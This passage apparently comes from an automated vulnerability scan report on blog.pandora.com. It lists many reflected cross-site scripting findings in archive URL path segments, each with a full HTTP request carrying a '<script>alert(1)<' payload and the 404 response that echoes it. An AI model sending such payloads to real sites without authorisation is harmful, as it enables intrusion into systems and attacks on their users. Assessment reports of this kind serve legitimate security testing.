Path: | /pandora/archives/2007/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/11be509<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/11be509<script>alert(1)< ...[SNIP]... |
3.133. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/12 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora22432<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora22432<script>alert(1)< ...[SNIP]... |
3.134. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/12 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6520c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6520c<script>alert(1)< ...[SNIP]... |
3.135. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/12 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a6d8f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)< ...[SNIP]... |
3.136. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2007/12 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/123bf47<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)< ...[SNIP]... |
3.137. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/01 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9839c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9839c<script>alert(1)< ...[SNIP]... |
3.138. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/01 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc4d9b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc4d9b<script>alert(1)< ...[SNIP]... |
3.139. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/01 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200859e99<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200859e99<script>alert(1)< ...[SNIP]... |
3.140. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/01 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/01fe2be<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)< ...[SNIP]... |
3.141. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/02 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ac1f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2ac1f<script>alert(1)< ...[SNIP]... |
3.142. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/02 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives34032<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives34032<script>alert(1)< ...[SNIP]... |
3.143. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/02 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086411d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20086411d<script>alert(1)< ...[SNIP]... |
3.144. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/02 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/02e1573<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)< ...[SNIP]... |
3.145. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/03 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora172d5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora172d5<script>alert(1)< ...[SNIP]... |
3.146. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/03 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5ee2e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5ee2e<script>alert(1)< ...[SNIP]... |
3.147. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/03 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085184f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20085184f<script>alert(1)< ...[SNIP]... |
3.148. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/03 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/03dff11<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)< ...[SNIP]... |
3.149. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/04 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8b984<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8b984<script>alert(1)< ...[SNIP]... |
3.150. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/04 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesabb6d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesabb6d<script>alert(1)< ...[SNIP]... |
3.151. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/04 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008465a8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008465a8<script>alert(1)< ...[SNIP]... |
3.152. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/04 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/048193f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/048193f<script>alert(1)< ...[SNIP]... |
3.153. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/05 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafba06<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafba06<script>alert(1)< ...[SNIP]... |
3.154. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/05 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives189bf<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives189bf<script>alert(1)< ...[SNIP]... |
3.155. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/05 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008df6e5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008df6e5<script>alert(1)< ...[SNIP]... |
3.156. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/05 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/05150c1<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)< ...[SNIP]... |
3.157. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/06 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora15eb9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora15eb9<script>alert(1)< ...[SNIP]... |
3.158. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/06 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec3a9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesec3a9<script>alert(1)< ...[SNIP]... |
3.159. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/06 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200846068<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200846068<script>alert(1)< ...[SNIP]... |
3.160. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2008/06 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/06c3962<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)< ...[SNIP]... |
3.161. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
